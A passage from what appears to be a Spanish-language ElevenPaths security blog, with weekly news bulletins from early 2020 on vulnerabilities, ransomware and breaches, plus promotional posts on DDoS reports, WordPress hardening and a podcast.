devolviera nombres de cuentas específicas en respuesta a consultas, además de suspender cualquier cuenta que creyesen estaba explotando dicho endpoint. Toda la información: https://privacy.twitter.com/en/blog/2020/an-incident-impacting-your-account-identity Vulnerabilidad XSS en WhatsApp Facebook ha parcheado una vulnerabilidad de criticidad alta en WhatsApp que permitía a los atacantes leer los archivos del sistema local de la víctima. La vulnerabilidad, CVE-2019-18426, fue descubierta por el investigador de PerimeterX Gal Weizman cuando encontró un fallo en la Política de Seguridad de Contenido (CSP) de WhatsApp, que permitía realizar un cross-site scripting (XSS) en la aplicación de escritorio. Esto permitió a Weizman obtener permisos de lectura en el sistema de archivos local tanto en Windows como en MacOS. Para explotar este fallo, es necesario que la víctima acceda a la vista previa de un enlace malicioso. Este fallo aplica a las versiones de escritorio de WhatsApp inferiores a 0.3.9309 combinada con dispositivos iPhone con versión anterior a 2.20.10. Más: https://www.perimeterx.com/tech-blog/2020/whatsapp-fs-read-vuln-disclosure/ Explotación de vulnerabilidades en controladores de GIGABYTE para desactivar software antivirus Investigadores de Sophos han descubierto que el ransomware RobinHood estaría explotando una vulnerabilidad (CVE-2018-19320) en controladores de GIGABYTE para conseguir infectar a los usuarios. Durante un análisis de equipos infectados con este ransomware, se ha destapado que el malware estaría cerrando procesos de antivirus y software de seguridad del sistema operativo antes de proceder a cifrar los datos, a pesar de que Windows únicamente permite ejecutar el cierre de dichos procesos de seguridad a aquellos controladores con permisos de Kernel. Además, Windows ha implementado una política de seguridad que impide la instalación de controladores del Kernel excepto si estos son también supervisados y firmados por la compañía, para evitar, concretamente, que un controlador malicioso obtenga permisos de este nivel. Sin embargo, se ha desvelado que RobinHood ha burlado esta política de seguridad explotando controladores vulnerables de GIGABYTE, los cuales sí tienen la firma de Microsoft, y por tanto permisos de nivel Kernel. Además, aprovecha esta ventaja para deshabilitar la política de seguridad que verifica la firma, sin la cual instala un driver de Kernel malicioso que finaliza los procesos de productos endpoint y de antivirus del sistema para poder ejecutar, sin interferencias, su fase del ataque de ransomware. Más información en: https://news.sophos.com/en-us/2020/02/06/living-off-another-land-ransomware-borrows-vulnerable-driver-to-remove-security-software/ Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de innovación y laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
7 de febrero de 2020
Informe global de amenazas DDoS
A nivel mundial, los ataques de denegación de servicio (DDoS, por sus siglas en inglés) se han vuelto más frecuentes, potentes y sofisticados. Para los atacantes, ejecutar DDoS como principal vector de ataque continúa siendo un éxito a la hora de lograr sus objetivos. Se estima que aproximadamente 7.7 millones de dispositivos nuevos se añaden a Internet cada día. De estos, un gran número son deficientes o incluso no poseen los niveles de seguridad adecuados. Así, terminan siendo controlados por ciberdelincuentes que, a su vez, los utilizan como arma para desencadenar ciberataques en un orden de magnitud sin precedentes. Los proveedores de servicios de telecomunicaciones juegan un papel fundamental a la hora de ofrecer disponibilidad y rendimiento en las redes, protegiendo el tráfico de Internet contra inminentes ataques DDoS. Han hecho uso de sus capacidades para ofrecer mitigación y protección proactiva contra ataques DDoS. Con los datos de este informe, la experiencia local así como los servicios y alianzas, las empresas aún pueden protegerse y reducir el riesgo de sufrir interrupciones en sus negocios en línea. La alianza plurirregional de las grandes empresas de comunicaciones que forman la TSA, junto con socios como Netscout, nos brinda información completa y fidedigna para poder comprender el panorama DDoS. Compartimos este conocimiento para concienciar y, al mismo tiempo, ayudar a las empresas e instituciones a hacer frente a este tipo de amenazas. Los sofisticados métodos de ataque reportados por los equipos de TSA SOC, unidos a los crecientes problemas geopolíticos a nivel regional, predicen un 2020 complicado para todos. El informe global de amenazas DDoS de 2019 proporciona un análisis experto detallado del panorama global de amenazas DDoS, así como datos objetivos sobre ataques globales y regionales monitorizados que han sido detectados por el Sistema de Análisis Avanzado de Amenazas de Netscout. Ya disponible el informe de amenazas DDoS 2019
5 de febrero de 2020
Caso de éxito durante los Juegos Panamericanos 2019
El pasado año, durante los Juegos Panamericanos Lima 2019, la organización de los mismos realizó un concurso público. El objetivo de esta convocatoria fue buscar al proveedor que mejor brindara respaldo tecnológico durante la organización del evento y evitar cualquier tipo de ataque cibernético. Fuimos los ganadores de este concurso público haciéndonos cargo de todas las comunicaciones, enlaces de internet, interconexión de más de 32 sedes deportivas y ciberseguridad. Adicionalmente, los Juegos Panamericanos realizaron un convenio de cooperación con la Marina de Guerra de Perú para que pudieran revisar toda la ciberseguridad de éstos. Para ello, las tres organizaciones tuvimos que realizar un trabajo conjunto para que todo saliera sin ningún incidente digital, y así fue. Ayudamos a contener los ciberataques tan habituales en este tipo de competiciones internacionales. ¿Cómo hemos desarrollado nuestro servicio? Desde Telefónica hemos trabajado en la fase previa durante un año entero, en la de implementación, durante seis meses; y en la fase de operaciones, que exigió un servicio 24-7 de soporte que pudimos dar gracias a nuestros Centros de Operaciones de Seguridad (SOC). Además de todo ello, desde Perú implementamos un equipo de trabajo con ingenieros especialistas locales e ingenieros de Telefónica Global para que el soporte fuera más personalizado. “Las estadísticas confirman que la gestión de la seguridad en las empresas debe ser uno de los principales pilares en su transformación digital. La experiencia de los Juegos Panamericanos y Parapanamericanos Lima 2019 ha permitido mostrar que, como Telefónica, mantenemos un desarrollo continuo de nuestro portfolio de productos y servicios de ciberseguridad que nos permite garantizar operaciones seguras a nuestros clientes”, declara César Farro, experto en Seguridad de Movistar, durante la conferencia de la Marina de Guerra de Perú y la organización de los Juegos Panamericanos y Parapanamericanos Lima 2019, sobre las mejores prácticas de seguridad desplegadas. Fuimos el partner tecnológico de los Juegos Panamericanos y Parapanamericanos 2019, que detectó y bloqueó más de 1800 malwares de los 43 mil ataques reportados. Telefónica también fue reconocida por ser la proveedora de los equipos que se encargaron de monitorear la ciberseguridad durante los Juegos. Nota de prensa completa aquí: https://saladeprensa.telefonica.com.pe/mas-de-43000-ataques-ciberneticos-fueron-detectados-a-tiempo-durante-los-juegos-lima-2019/
5 de febrero de 2020
#NoticiasCiberseguridad: Boletín de ciberseguridad semanal 27-31 de enero
Primera vulnerabilidad RCE en Microsoft Azure Investigadores de Check Point identificaron el pasado otoño la primera vulnerabilidad en una plataforma cloud de amplio uso que permitiría romper un axioma de la seguridad en la nube, el aislamiento, mediante el acceso y ejecución remota de código en instancias de terceros propietarios. Esta vulnerabilidad se corresponde en realidad con dos vulnerabilidades que fueron solventadas por Microsoft en octubre pero cuyos detalles no fueron revelados, CVE-2019-1372 (CVSS 10.0) & CVE-2019-1234 (CVSS 7.5). Para corregir los fallos, es necesario que tanto Microsoft como el operador de la nube actualicen los sistemas conforme a instrucciones del fabricante (disponibles aquí y aquí). La vulnerabilidad no se ha hecho pública hasta esta semana y no se conocen intentos de explotación de la misma. Información completa aquí: https://www.forbes.com/sites/zakdoffman/2020/01/30/severe-perfect-100-microsoft-flaw-confirmed-this-is-a-cloud-security-nightmare/#2eb11337b4a4 Análisis de Ragnarok, el ransomware contra servidores Citrix ADC Se van conociendo nuevos detalles del nuevo ransomware Ragnarok, que estaría aprovechando aquellos servidores Citrix ADC que no tuvieran corregida la vulnerabilidad CVE-2019-19781 ya parcheada. El malware inyecta un fichero DLL (biblioteca de vínculos dinámicos) tras detectar que el dispositivo es aún vulnerable y, posteriormente el fichero descarga e instala el ransomware en el equipo. El responsable de SentinelLabs, Vitali Kremez, ha conseguido extraer el fichero de configuración de Ragnarok, y tras su análisis, se ha desvelado que el malware detecta el lenguaje instalado en la máquina de la víctima, que usa como filtro para no cifrar aquellos equipos cuyos lenguajes sean el ruso o el chino, entre otros. Por otro lado, se ha desvelado también que se intenta deshabilitar Windows Defender de Microsoft, manipulando las políticas de grupo de Windows. Se hallaron otros elementos curiosos en el análisis del fichero de configuración, como son unas referencias a rutas pertenecientes a sistemas Unix/Linux, lo cual hace sospechar que este ransomware está siendo desarrollado con visión de infectar sistemas más allá de Windows. Finalmente, y cumpliendo con la dinámica de cifrado que acostumbran, el ransomware cifra los archivos con su propio nombre como extensión ".ragnarok". Para más información: https://www.bleepingcomputer.com/news/security/ragnarok-ransomware-targets-citrix-adc-disables-windows-defender Avast habría recopilado y vendido datos privados de navegación de usuarios Una investigación conjunta llevada a cabo por Motherboard y PCMag indicaría que el gigante antivirus Avast estaría vendiendo los datos de navegación web. Avast estaría recopilando los datos de los usuarios suscritos y luego proporcionándoselos a Jumpshot, subsidiaria de Avast, que los empaquetaría en varios productos diferentes que luego vendería a muchas de las compañías más grandes del mundo. Los datos obtenidos incluirían entre otros datos búsquedas en Google o las visitas a sitios web porno. Aunque los datos no incluirían información personal, y los expertos dicen que podría ser posible desanonimizar a ciertos usuarios. Hasta hace poco, Avast recopilaba los datos de navegación a través del complemento de navegador de la compañía, diseñado para advertir a los usuarios de sitios web sospechosos. Sin embargo a raíz una publicación de blog en octubre del investigador de seguridad Wladimir Palant, en la que mostraba que Avast cosechaba datos de usuario con ese complemento, los principales fabricantes de navegador eliminaron la extensión de sus respectivas tiendas de extensiones. Sin embargo, la recopilación de datos seguiría en curso ahora a través del software antivirus en sí. No obstante varios usuarios de Avast han señalado que no sabían que Avast estaría vendiendo dichos datos de navegación. A raíz de conocerse la información, Avast ha anunciado su intención de dejar de trabajar con Jumpshot. Más información: https://www.vice.com/en_us/article/qjdkq7/avast-antivirus-sells-user-browsing-data-investigation Posible hackeo a la ONU intentado mantener en secreto Investigadores de seguridad de The New Humanitarian afirman haber tenido acceso a un informe confidencial de las Naciones Unidas y desvelan que dicho organismo habría sido comprometido y que habrían tratado de ocultarlo. Según este informe confidencial, los atacantes habrían irrumpido en docenas de servidores de la ONU a partir de julio de 2019, viéndose comprometidos los registros del personal, el seguro médico y los datos de los contratos comerciales. Desde el organismo, se solicitó al personal que cambiara sus contraseñas pero no se les informó de la posible fuga. Bajo inmunidad diplomática, la ONU no está obligada a divulgar qué información habría sido comprometida ni a notificar a los afectados. Además en el informe se indica que el ataque se podría haber evitado con un simple parche para arreglar un error de software que afectó a los sistemas de Ginebra y Viena. El investigador de seguridad Kevin Beaumont añade que el origen del ataque podría haber estado en la explotación de una vulnerabilidad en SharePoint (CVE-2019-0604) conocida desde hace un año. Noticia completa: https://www.thenewhumanitarian.org/investigation/2020/01/29/united-nations-cyber-attack SIM swapping a través del compromiso de las teleoperadoras Motherboard ha ampliado la información recogida en un artículo publicado el pasado 10 de enero, donde alertaba de la detección de un viraje en el mundo de los ataques de SIM swapping por el que los atacantes habrían pasado ya al intento de compromiso de los números de teléfono de los usuarios directamente a partir del compromiso inicial de los empleados de las empresas de telecomunicaciones. En el nuevo artículo el medio amplía la información conocida, tras haber obtenido más evidencias de intentos de compromiso de empleados de algunas compañías de telecomunicaciones como Verizon, Sprint o T-Mobile, o de empleados de vendedores autorizados de las mismas. Según las investigaciones, los atacantes estarían enviando correos de phishing a los empleados, con el objetivo de comprometerlos y obtener sus credenciales para los paneles de acceso de los programas utilizados para la gestión de los servicios de atención al cliente, a través de los cuales los atacantes podrían en último término crear o modificar cuentas de clientes. El investigador Nicholas Ceraolo confirma que algunos de los phishings estaban enfocados al compromiso de servicios de VPN de Citrix, a través de los cuales los empleados se conectan a la red de las empresas para acceder a los sistemas internos. Uno de los sistemas confirmados los atacantes han tratado de vulnerar ha sido Omni, la herramienta de servicio de atención al cliente de Verizon. Más información aquí: https://www.vice.com/en_us/article/v74b4d/sim-swappers-phishing-verizon-sprint-tmobile-to-access-internal-tools Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de innovación y laboratorio de ElevenPaths. Visita el canal de Telegram aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
31 de enero de 2020
Seguridad para WordPress: tu página web también necesita protección
Los sistemas de Gestión de Contenidos o CMS (del inglés Content Management System), usados para comercio electrónico, blogs, foros, enseñanza online, etc. se han convertido en un objetivo especialmente tentador para los atacantes debido a su crecimiento y gran presencia en internet. La facilidad de disponer de una página web de este tipo sin demasiado esfuerzo ni conocimientos técnicos implica que muchas empresas y particulares desplieguen estas aplicaciones con múltiples vulnerabilidades por utilizar una versión, plugins y temas desactualizados y/o malas configuraciones en el servidor que las aloja. Recientemente hemos visto varios plugins muy populares en los que se han encontrado vulnerabilidades, como explica Pablo González en este artículo de "Un informático en el lado del mal". WordPress tiene una gran reputación ya que está presente en aproximadamente una de cada tres páginas en internet, siendo el gestor de contenidos más popular a nivel mundial debido a su facilidad de uso y la madurez de la comunidad de desarrollo, con más de 50.000 plugins y 5000 temas gratuitos y de pago en su repositorio oficial. Estos plugins, desarrollados por terceros, añaden nuevas funcionalidades a WordPress como calendarios, buscadores, formularios de contacto avanzados, chats en vivo entre cliente y empresa, etc. Este elevado número de plugins de terceros implica un vector de riesgo adicional para las organizaciones, ya que no sólo se producen brechas de seguridad por el propio software de CMS, sino también por estos plugins y/o temas instalados. Dada su gran variedad y constante cambio, se hace difícil para una pyme o para un individuo estar al tanto de las amenazas. Además de contar con una versión actualizada de WordPress y los plugins de funcionalidad de terceros, la configuración del servidor web que aloja la aplicación es igual de importante para garantizar la seguridad de la web ante atacantes. ¿Cómo puedes proteger tu página web? ¿Sabías que el 60 % de las pymes que sufren un ciberataque desaparece en menos de seis meses tras el incidente? El coste medio de un ataque es de 35.000€. La protección es básica para evitar que te ocurra, aunque, por suerte, existen alternativas para proteger tu página web o tu blog. Faast for WordPress es un producto desarrollado por ElevenPaths que permite llevar un seguimiento controlado y continuo de la seguridad de las webs que utilizan WordPress. Un producto muy fácil de gestionar que se actualiza continuamente y de forma transparente para el usuario para detectar nuevos ataques y vulnerabilidades en WordPress, el servidor web que lo aloja y los plugins y temas de terceros instalados. La seguridad de tu WordPress, en tus manos Tú mismo puedes gestionar la seguridad de tu página web, sigue estos consejos para mantener tu herramienta segura: Escanea tu web al menos una vez a la semana. Corrige las vulnerabilidades que muestre Faast for WordPress sobre tu web: Configuraciones no seguras. Actualizaciones de versiones de WordPress Plugins y temas actualizados. No descargues e instales plugins o temas que hayan sido descargados de sitios webs con mala reputación. Elige un servicio de hosting seguro. Realiza copias de seguridad habitualmente y asegúrate de que son correctas probando a restaurarlas. Introduce pequeños cambios en la configuración por defecto: No uses el usuario admin. Cambia el prefijo de las tablas wp_ Usa contraseñas seguras. Cambia la ruta del login del administrador.
30 de enero de 2020
#NoticiasCiberseguridad: Boletín de ciberseguridad semanal 20-24 de enero
Exposición de registros de soporte al cliente de Microsoft Microsoft ha admitido haber sufrido un incidente de seguridad que habría expuesto cerca de 250 millones de registros de conversaciones de clientes con el servicio de soporte de Microsoft debido a una mala configuración en sus servidores. El equipo de investigadores de Comparitech ha afirmado que la mayor parte de los datos personales habrían sido eliminados de los registros, sin embargo, todavía queda información sensible almacenada en texto plano como direcciones de correo electrónico, direcciones IP, ubicaciones, números de los casos, resoluciones de los casos y notas marcadas como confidenciales. Estos registros contenían datos de fechas comprendidas entre 2005 y diciembre de 2019. Al tratarse de información sensible de casos reales, los actores maliciosos podrían utilizar esta información para engañar a los usuarios haciéndose pasar por el soporte de Microsoft. Más información: https://msrc-blog.microsoft.com/2020/01/22/access-misconfiguration-for-customer-support-database/ Arabia Saudí comprometió el iPhone de Jeff Bezos Ayer se dio a conocer que el iPhone de Jeff Bezos, dueño de Amazon y del medio estadounidense The Washington Post, se vio comprometido entre mayo de 2018 y febrero de 2019. De acuerdo con la investigación encargada por el afectado a FTI Consulting, todo comenzó tras una cena en abril entre Bezos y el príncipe heredero de Arabia Saudí Mohamed bin Salman, donde se intercambiaron los números de teléfono. En mayo Bezos recibió vía WhatsApp un video MP4 procedente del móvil de bin Salman; los investigadores han considerado este video como el origen de la infección dado que a partir de entonces el iPhone comenzó a enviar ingentes cantidades de datos sin autorización (de manera previa, el móvil alcanzaba un promedio de 430KB de salida al día, y pasó a tener una media de 101MB). Aunque los investigadores no han encontrado evidencia de ningún malware en el teléfono ya que no han podido acceder al sistema de ficheros raíz, el elevado volumen de datos, junto con dos mensajes recibidos por WhatsApp con información que hasta el momento era confidencial, les hace pensar en la existencia de este malware, cuyo comportamiento coincide con los software de espionaje para móvil Pegasus y Galileo, creados, respectivamente por la agencia israelí NSO y la italiana Hacking Team. Para leer más: https://www.vice.com/en_us/article/v74v34/saudi-arabia-hacked-jeff-bezos-phone-technical-report Trickbot añade nuevo módulo de exfiltración de Directorio Activo Se ha descubierto un nuevo módulo del troyano TrickBot que atacaría la base de datos del Directorio Activo almacenada en los controladores de dominio de Windows. Este nuevo módulo, llamado ADll, ejecutaría una serie de comandos en Windows que permitirían al troyano robar bases de datos del Directorio Activo de Windows. Si el actor amenaza consigue obtener acceso administrativo al controlador de dominio, hará uso del comando 'ntdsutil', el cual permitiría realizar acciones sobre la base de datos. Además, este se aprovecharía del comando "ifm" (Install from Media) para volcar la base de datos y los registros a la carpeta %Temp%. Posteriormente, se comprimirían estos archivos y se enviarían a los atacantes. Una vez los atacantes tienen acceso a estos archivos, pueden descifrar la base de datos y acceder a los nombres de usuario, los hash de las contraseñas o los nombres de equipo y grupos entre otros datos. Más información: https://www.bleepingcomputer.com/news/security/trickbot-now-steals-windows-active-directory-credentials/ Vulnerabilidad 0-day en Internet Explorer Microsoft ha anunciado el descubrimiento de una vulnerabilidad crítica en el navegador web Internet Explorer que podría permitir a un atacante remoto ejecutar código en el equipo de la víctima. La vulnerabilidad aprovecha un fallo en la gestión de memoria del motor de scripting de Windows. Un atacante podría construir una página web maliciosa y conseguir que la víctima navegara hacia dicha página empleando técnicas de ingeniería social u otras para llevar a cabo ejecución de código sobre el equipo de la víctima. Si la víctima está conectada con derechos de administrador, el atacante que explote esta vulnerabilidad podría tomar el control del sistema afectado, llegando a instalar programas, modificar datos o crear nuevas cuentas de usuario. No existe todavía un parche para la resolución de la vulnerabilidad. Sin embargo, el proyecto 0patch ha creado una solución temporal disponible gratis aquí mientras Microsoft termina de desarrollar la solución definitiva, que probablemente se hará pública antes de final de mes. Noticia completa: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200001 Vulnerabilidad crítica en Cisco Firepower Management Center La interfaz web del Cisco FMC (Firepower Management Center) presenta una nueva vulnerabilidad que podría permitir que un atacante ejecute código arbitrario de manera remota. El fallo crítico se debe al error que existe en la gestión de la respuesta a aquellas peticiones de autenticación que se solicitan a un servidor externo LDAP (Lightweight Directory Access Protocol), lo cual posibilita que un agente amenaza pueda burlar el proceso de autenticación. La explotación de esta vulnerabilidad, identificada como CVE-2019-16028 y a la que se ha asignado un CVSS de 9.8, pasaría por enviar una petición HTTP especialmente diseñada al dispositivo de Cisco en el proceso de autenticación, con lo que se podría adquirir permisos de administrador para acceder a la interfaz web de gestión del dispositivo afectado. Cabe destacar que se verían afectados únicamente aquellos sistemas que cuenten con un servidor LDAP externo para la autenticación. Desde el equipo de respuesta ante incidentes de Cisco Product Security (PSIRT), afirman que no se tiene conocimiento de ningún exploit publicado para aprovecharse de esta vulnerabilidad. Más información: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200122-fmc-auth Si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram y estate al día en seguridad digital.
24 de enero de 2020
¡Nuevo podcast! Actualidad con nuestros expertos en #ElevenPathsRadio
Tras el éxito de la primera temporada de #ElevenPathsRadio, en la que entrevistamos a los expertos más relevantes del sector de la ciberseguridad, comenzamos un nuevo programa. Nuestros Chief Security Ambassadors (CSAs) repasarán mensualmente los temas de actualidad más interesantes en esta nueva serie de podcast. En el capítulo de hoy, Gabriel Bergel, nuestro CSA de Chile explica que hoy en día no existe excusa para no estar interesado por la ciberseguridad, solo a nivel personal el uso de smartphones nos expone a una serie de riesgos si no somos conscientes en el uso de esta tecnología y en redes sociales. Si tenemos hijos estos riesgos aumentan y a nivel profesional más aun. En este podcast abordamos la necesidad de la ciberseguridad desde el nivel personal al profesional, explicando las amenazas y vulnerabilidades en estos ambientes y los controles que ayudan a mitigar los riesgos. ¿Por qué hoy en día es tan necesaria la ciberseguridad? Ya disponible el primer capítulo de actualidad en ciberseguridad con nuestros expertos, ¡que lo disfrutes, hacker! Más capítulos de "ElevenPaths Radio, Actualidad con nuestros expertos": CYBER SECURITY ElevenPaths Radio #12 - Simulación de Adversarios / MITRE ATT&CK 13 de enero de 2021 CYBER SECURITY ElevenPaths Radio #11 – Malware en librerías de desarrollo 14 de diciembre de 2020 CYBER SECURITY ElevenPaths Radio #10 – Startups & Ciberseguridad 19 de octubre de 2020 CYBER SECURITY ElevenPaths Radio #9 - Nuevas tecnologías y el futuro en Ciberseguridad 14 de septiembre de 2020 CYBER SECURITY ElevenPaths Radio #8 - Incidente de seguridad, primeros pasos 10 de agosto de 2020 CYBER SECURITY ElevenPaths Radio #7 - El camino tras un análisis de seguridad 13 de julio de 2020 CYBER SECURITY ElevenPaths Radio #6 - Asegurando la cadena de suministro 8 de junio de 2020 CYBER SECURITY ElevenPaths Radio [Edición especial] - La vuelta de Anonymous 4 de junio de 2020 CYBER SECURITY ElevenPaths Radio #4 – Teletrabajo seguro 25 de marzo de 2020 CYBER SECURITY ElevenPaths Radio #3 - Privacidad y protección de datos personales 16 de marzo de 2020 CYBER SECURITY ElevenPaths Radio #2 - Competencias de un profesional de ciberseguridad 17 de febrero de 2020 Si quieres escuchar la primera temporada de entrevistas de ElevenPaths Radio, haz click en el siguiente enlace. CYBER SECURITY Presentamos nuestros nuevos podcast: ElevenPaths Radio 31 de mayo de 2019
20 de enero de 2020
#NoticiasCiberseguridad: Boletín de ciberseguridad semanal 13-17 de enero
Las noticias de ciberseguridad más relevantes de la semana, recopiladas por nuestros expertos. Exploit público para CVE-2020-0601 Se ha publicado un exploit para la vulnerabilidad CVE-2020-0601 (CVSSv3 8.1) de suplantación de identidad en la que Windows CryptoAPI valida los certificados de ECC de los productos de software. Como ya se reportó en boletines anteriores, esta vulnerabilidad permitiría que Windows confiase en un certificado ECC falso. La clave pública de este certificado debe coincidir con alguna de las claves públicas de los certificados del almacén de certificados de confianza de Windows y uno de los parámetros del certificado ECC también debe coincidir. El exploit permite crear, a partir de un certificado ECC cualquiera, uno que cumpla estos requisitos. El certificado generado por el exploit se emplearía como una CA propia con la que se podrían firmar varios certificados. Estos certificados podrían utilizarse para firmar código o se podrían generar directamente a nombre del servidor que se trataría de suplantar. Más información: https://github.com/ollypwn/cve-2020-0601 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601 Publicación de exploits para vulnerabilidad en Citrix Durante el pasado fin de semana se ha hecho público un exploit para la vulnerabilidad CVE-2019-19781 que afecta a Citrix ADC (NetScaler) y que permite a usuarios no autorizados utilizar el directorio transversal para lograr ejecuciones remotas de código. Según las Pruebas de Concepto (PoC) publicadas, los atacantes pueden crear reverse shells y ejecutar comandos en los dispositivos vulnerables, lo que permite obtener el control total de estos. Se espera que a partir de ahora, el aumento de escaneos detectados recientemente se transformen en intentos de explotación. Pese a que los parches de Citrix no estarán disponibles hasta finales del mes de enero aproximadamente, se recomienda aplicar las reglas SIGMA y Snort existentes para mitigar el fallo, al mismo tiempo que es aconsejable seguir los pasos detallados por los expertos de TrustedSec para detectar la explotación. Más información: https://www.bleepingcomputer.com/news/security/citrix-adc-cve-2019-19781-exploits-released-fix-now/ Reactivación de campaña de Emotet Tras su adaptación al mensaje festivo durante las últimas semanas, Emotet ha vuelto con nuevas campañas dirigidas en estos momentos contra más de ochenta países a través del envío masivo de spam. Estas nuevas campañas incluyen emails comunes y cadenas de respuestas que pretenden ser informes, acuerdos y declaraciones con un archivo o link malicioso adjunto. Cuando la víctima abre el documento y habilita las macros, éstas descargarían y ejecutarían Emotet. Una vez instalado, el malware utilizaría el sistema infectado para la sustracción de información, el envío de más spam y la descarga de otras familias como TrickBot, desencadenando infecciones ulteriores. Más información: https://www.bleepingcomputer.com/news/security/emotet-malware-restarts-spam-attacks-after-holiday-break/ Ransomware Sodinokibi se suma a la tendencia de publicar datos de sus víctimas Desde hace aproximadamente un mes se está detectando lo que parece ser una nueva tendencia en relación con los ataques con ransomware; se trata de la publicación de los datos de las víctimas que no han pagado el rescate exigido por los atacantes. Los primeros en publicar una lista de víctimas fueron los gestores del ransomware Maze el 11 de diciembre, a través de una página web que se ha ido actualizando paulatinamente con datos de nuevas víctimas, siendo la última Southwire, para la que los operadores acaban de publicar hasta 14GB de datos robados. A esta tendencia se han sumado recientemente los operadores del ransomware Sodonikibi, cuyos operadores podrían haber publicado los datos cifrados de Artech Information Systems en un foro de origen ruso, tras las amenazas contra otras empresas infectadas como Travelex o CDH Investments. Es de esperar por tanto que esta práctica continúe y otros ransomware publiquen datos de sus víctimas. Más información: https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-publishes-stolen-data-for-the-first-time/ Cable Haunt, vulnerabilidad en módems con chips Broadcom Un equipo de investigadores de seguridad ha descubierto un fallo de seguridad que afectaría a los módem que utilizan chips Broadcom y a la que han denominado Cable Haunt. La vulnerabilidad, CVE-2019-19494, afectaría al analizador de espectro, un componente estándar de los chips Broadcom que carece de protección contra ataques de revinculación de DNS, que utiliza credenciales predeterminadas y que contiene un error en su firmware. Si un usuario accede a una página maliciosa, el atacante podría utilizar el navegador para ejecutar el exploit en el componente vulnerable y ejecutar comandos en el dispositivo. Se cree que este fallo afectaría a unos 200 millones de módems solo en Europa. Más: https://cablehaunt.com/ Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de innovación y laboratorio de ElevenPaths. Visita el canal de Telegram aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
17 de enero de 2020
#NoticiasCiberseguridad: Boletín de ciberseguridad semanal 6-10 de enero
Ataques a servidores Pulse Secure VPN con ransomware Sodinokibi Una vulnerabilidad en Pulse Secure VPN (CVE-2019-11510) está siendo utilizada por agentes amenaza para introducir el ransomware Sodinokibi (REvil) en las organizaciones que no tienen dicho software parcheado. El investigador de seguridad Kevin Beaumont señala que el error de Pulse Secure VPN es crítico ya que permite a los atacantes remotos, sin credenciales válidas, conectarse remotamente a la red corporativa, deshabilitar la autenticación multi-factor y ver los registros y las contraseñas en texto plano almacenadas en caché, incluyendo las contraseñas de las cuentas de Active Directory. Según un análisis realizado el pasado cuatro de enero por la empresa de seguridad Bad Packets, existen hasta 3.825 servidores VPN Pulse Secure que no habían sido parcheados. Algunos investigadores apuntan a que el incidente de seguridad que sufrió la empresa Travelex, que se apuntó días más tarde habría sido como consecuencia de una infección por Sodinokibi, podría guardar relación con una falta de parcheado de algunas vulnerabilidades en servidores Pulse Secure VPN. Más información: https://doublepulsar.com/big-game-ransomware-being-delivered-to-organisations-via-pulse-secure-vpn-bd01b791aad9 Mozilla parchea vulnerabilidad 0-day en Firefox Mozilla ha lanzado Firefox v72.0.1, una nueva versión del navegador web que corrige una vulnerabilidad 0-day que estaría siendo explotada activamente. Este fallo afecta a IonMonkey, que es el compilador JIT para SpiderMonkey, el intérprete de JavaScript que se emplea en Firefox. La vulnerabilidad fue categorizada como type confusion, un error en el que una entrada de la memoria se asigna inicialmente como un tipo, pero se cambia a otro durante su manipulación, causando errores en el procesamiento de los datos, pudiendo dar lugar a la ejecución de código en un sistema vulnerable. Desde la propia compañía aseguran que este fallo ya está siendo aprovechado por actores maliciosos. Más información: https://www.mozilla.org/en-US/security/advisories/mfsa2020-03/#CVE-2019-17026 PowerTrick, nueva puerta trasera de TrickBot Los actores amenaza detrás de TrickBot habrían desarrollado una nueva puerta trasera en PowerShell denominada PowerTrick cuyo objetivo final sería evitar las restricciones y los controles de seguridad más actualizados para atacar objetivos de alto valor como instituciones financieras. Según los investigadores de SentinelLabs que han analizado esta nueva amenaza, esta nueva puerta trasera se desplegaría como un módulo después de que la infección inicial de TrickBot se haya hecho con el control del sistema, y estaría diseñado para ejecutar comandos y devolver los resultados codificados en Base64. La amenaza fue descubierta una vez que se identificó un script de puerta trasera que establecía contacto con uno de los servidores Command & Control de Trickbot, desde el que los operadores proceden a enviar el primer comando en forma de descarga de PowerTrick. Más información: https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/ Vulnerabilidad en Paypal permite obtener contraseñas de usuarios El investigador de seguridad Alex Birsan ha informado sobre la explotación de una vulnerabilidad que afecta a Paypal y por la que se podrían obtener contraseñas de usuarios. El error fue reportado a PayPal a través de HackerOne el pasado día 18 de noviembre y la compañía no lanzó un parche hasta el 11 de diciembre, tras haber verificado toda la información. Birsan descubrió un fichero Javascript dinámico en la plataforma que contenía los valores csrf y el _sessionId utilizados para la resolución de reCaptcha. Al encontrarse esta información en JavaScript, los datos eran accesibles mediante un cross-site script inclusión (XSSI), con lo que siguiendo una serie de pasos podría obtener las contraseñas de los usuarios aprovechando los citados valores y la funcionalidad reCaptcha. PayPal ha corregido la vulnerabilidad implementando una tercera clave necesaria en la resolución del captcha que no es explotable por un XSSI. Como consecuencia de este vector de ataque se ha demostrado que la compañía mantenía las contraseñas los usuarios en texto plano. Más información: https://medium.com/@alex.birsan/the-bug-that-exposed-your-paypal-password-539fc2896da9 Nuevo ataque contra SHA1 Un grupo de investigadores ha descubierto un nuevo mecanismo para encontrar colisiones en el algoritmo de hash criptográfico SHA1. Si bien en el pasado ya se habían publicado otros ataques capaces de identificar colisiones, con este nuevo descubrimiento se reduce la complejidad y se dispone de una mayor versatilidad. Una aplicación posible de este ataque es la suplantación de claves PGP, mediante una falsificación de su firma. Esto apoya la recomendación ya existente de 